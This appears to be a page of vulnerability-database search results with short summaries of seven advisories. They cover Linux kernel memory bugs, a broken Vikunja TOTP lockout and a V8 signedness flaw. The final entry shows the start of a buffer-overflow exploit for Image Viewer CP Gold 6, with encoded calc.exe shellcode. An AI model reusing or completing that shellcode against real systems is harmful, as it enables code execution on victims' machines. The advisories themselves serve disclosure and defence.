7 matches found
EUVD-2026-39280
In the Linux kernel, the following vulnerability has been resolved: mm/hugememory: update file PMD counter before folioput splithugepmdlocked updates the file/shmem RSS counter after dropping the PMD mapping's folio reference. If folioput drops the last reference, mmcounterfile can later read fre...
CVE-2026-53189
CVE-2026-53189 affects the Linux kernel memory management for huge pages (mm/huge_memory). The vulnerability arises from the order of operations when splitting a huge PMD: the RSS/file counters are updated after releasing the folio reference, which can let freed folio state be observed by mm_coun...
CVE-2026-35597
Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the TOTP failed-attempt lockout mechanism is non-functional due to a database transaction handling bug. When a TOTP validation fails, the login handler in pkg/routes/api/v1/login.go calls HandleFailedTOTPAuth and then...
PT-2026-31948
Name of the Vulnerable Software and Affected Versions Vikunja versions prior to 2.3.0 Description A flaw exists in Vikunja before version 2.3.0 related to the Time-based One-Time Password TOTP failed-attempt lockout mechanism. A database transaction handling bug prevents the account lockout from...
Node.js: CWE-195 in ExternalMemoryAccounter::Increase()
Summary: V8's ExternalMemoryAccounter::Increase expects an unsigned sizet argument, but a signed ssizet which in some cases results in garbage collection to happen during garbage collection. Here's a simplified version of what happens full backtrace has been attached in the issue:...
The vulnerability in the virtual file system /proc of Linux kernel allows a attacker to trigger a service failure.
The vulnerability in the virtual file system /proc of Linux operating systems is related to concurrent access to the memory page counter by the functions pagemapcount and splithugepage in the taskmmu.c module. Exploiting this vulnerability can allow an attacker to cause a service failure...
Image Viewer CP Gold 6 Buffer Overflow
//payload is windows/exec cmd=calc.exe shellcode = unescape '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+ '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+ '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+...